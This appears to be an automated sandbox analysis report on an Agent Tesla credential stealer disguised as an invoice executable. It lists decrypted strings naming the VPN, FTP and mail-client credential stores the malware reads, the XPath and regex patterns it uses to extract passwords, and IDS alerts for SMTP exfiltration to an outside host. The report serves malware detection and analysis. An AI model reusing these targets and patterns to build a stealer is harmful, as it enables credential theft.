                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: APPDATA
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Psi\profiles
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: APPDATA
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Psi+\profiles
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \accounts.xml
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \accounts.xml
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: OpenVPN
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\OpenVPN-GUI\configs
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\OpenVPN-GUI\configs
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\OpenVPN-GUI\configs\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: username
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: auth-data
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: entropy
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: USERPROFILE
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \OpenVPN\config\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: remote
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: remote
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: NordVPN
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: NordVPN
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: NordVpn.exe*
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: user.config
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: //setting[@name='Username']/value
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: //setting[@name='Password']/value
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: NordVPN
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: -
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Private Internet Access
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: %ProgramW6432%
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Private Internet Access\data
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ProgramFiles(x86)
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Private Internet Access\data
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \account.json
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: .*"username":"(.*?)"
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: .*"password":"(.*?)"
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Private Internet Access
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: privateinternetaccess.com
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: FileZilla
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: APPDATA
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \FileZilla\recentservers.xml
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: APPDATA
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \FileZilla\recentservers.xml
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <Server>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <Host>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <Host>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </Host>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: :
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <Port>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </Port>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <User>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <User>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </User>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <Pass encoding="base64">
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <Pass encoding="base64">
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </Pass>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <Pass>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <Pass encoding="base64">
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </Pass>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: CoreFTP
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PW
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: User
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Host
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Port
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: hdfzpysvpzimorhk
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: WinSCP
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: HostName
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: UserName
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PublicKeyFile
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: :
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PortNumber
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 22
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: WinSCP
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: A
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 10
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: B
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 11
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: C
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 12
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: D
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 13
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: E
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 14
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: F
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 15
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ABCDEF
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Flash FXP
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: IP
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: :
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: port
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: user
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: pass
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: quick.dat
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Sites.dat
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \FlashFXP\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \FlashFXP\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: FTP Navigator
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SystemDrive
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \FTP Navigator\Ftplist.txt
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Server
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: No Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: User
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SmartFTP
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: APPDATA
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: WS_FTP
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: appdata
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: HOST
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: UID
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PWD
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PWD=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PWD=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: FtpCommander
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SystemDrive
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SystemDrive
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SystemDrive
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \cftp\Ftplist.txt
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ;Password=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ;User=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ;Server=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ;Port=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ;Port=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ;Password=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ;User=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ;Anonymous=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: :
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: FTPGetter
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \FTPGetter\servers.xml
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <server>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <server_ip>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <server_ip>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </server_ip>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: :
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <server_port>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </server_port>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <server_user_name>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <server_user_name>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </server_user_name>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <server_user_password>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <server_user_password>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </server_user_password>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: FTPGetter
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: The Bat!
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: appdata
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \The Bat!
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Account.CFN
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Account.CFN
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: zzz
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Becky!
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: DataDir
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Folder.lst
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Mailbox.ini
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Account
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PassWd
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Account
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SMTPServer
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Account
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: MailAddress
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Becky!
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Outlook
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Email
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: IMAP Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: POP3 Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: HTTP Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SMTP Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Email
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Email
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Email
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: IMAP Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: POP3 Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: HTTP Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SMTP Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Server
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Windows Mail App
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 1
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Email
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Server
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SchemaId
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: pResourceElement
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: pIdentityElement
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: pPackageSid
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: pAuthenticatorElement
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: syncpassword
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: mailoutgoing
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: FoxMail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Executable
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: FoxmailPath
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Storage\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Storage\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \mail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \mail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Accounts\Account.rec0
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Accounts\Account.rec0
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Account.stg
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Account.stg
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: POP3Host
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SMTPHost
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: IncomingServer
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Account
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: MailAddress
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: POP3Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 5A
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 71
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Opera Mail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: opera:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PocoMail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: appdata
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Pocomail\accounts.ini
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Email
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: POPPass
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SMTPPass
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SMTP
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: eM Client
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: eM Client\accounts.dat
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: eM Client
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Accounts
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: "Username":"
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ",
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: "Secret":"
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ",
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: "ProviderName":"
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ",
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: o6806642kbM7c5
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Mailbird
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SenderIdentities
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Accounts
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Mailbird\Store\Store.db
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Server_Host
                Source: INVOICE_NO._29998172.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: INVOICE_NO._29998172.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: tSku.pdb source: INVOICE_NO._29998172.exe, txQleCu.exe.0.dr
                Source: Binary string: tSku.pdbSHA256[ source: INVOICE_NO._29998172.exe, txQleCu.exe.0.dr
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 4x nop then jmp 0A6D75C3h0_2_0A6D6A08
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 4x nop then jmp 0AAB75C3h5_2_0AAB6A08

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49697 -> 5.100.152.24:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49697 -> 5.100.152.24:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49697 -> 5.100.152.24:587
                Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.3:49697 -> 5.100.152.24:587
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49698 -> 5.100.152.24:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49698 -> 5.100.152.24:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49698 -> 5.100.152.24:587
                Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.3:49698 -> 5.100.152.24:587
                Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                Source: global trafficTCP traffic: 192.168.2.3:49697 -> 5.100.152.24:587
                Source: global trafficTCP traffic: 192.168.2.3:49697 -> 5.100.152.24:587
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                Source: INVOICE_NO._29998172.exe, 00000006.00000002.629144860.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, txQleCu.exe, 0000000C.00000002.629486178.0000000002C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gimpex-imerys.com
                Source: INVOICE_NO._29998172.exe, 00000006.00000002.629144860.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, txQleCu.exe, 0000000C.00000002.629486178.0000000002C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.gimpex-imerys.com
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.398102973.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, txQleCu.exe, 00000005.00000002.437574152.0000000003341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.364564498.0000000005DCB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364485994.0000000005DCB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364509296.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364376733.0000000005DCA000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364528393.0000000005DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agfamonotype.5
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.363538297.0000000005DCC000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364528393.0000000005DCB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364115711.0000000005DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.363520351.0000000005DF4000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.363556816.0000000005DF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comitk
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.363657222.0000000005DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comj
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.366549798.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.365774175.0000000005DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.365970540.0000000005DCC000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.366153312.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.366056911.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.365997383.0000000005DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlC
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.365753646.0000000005DD6000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.365728088.0000000005DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers:
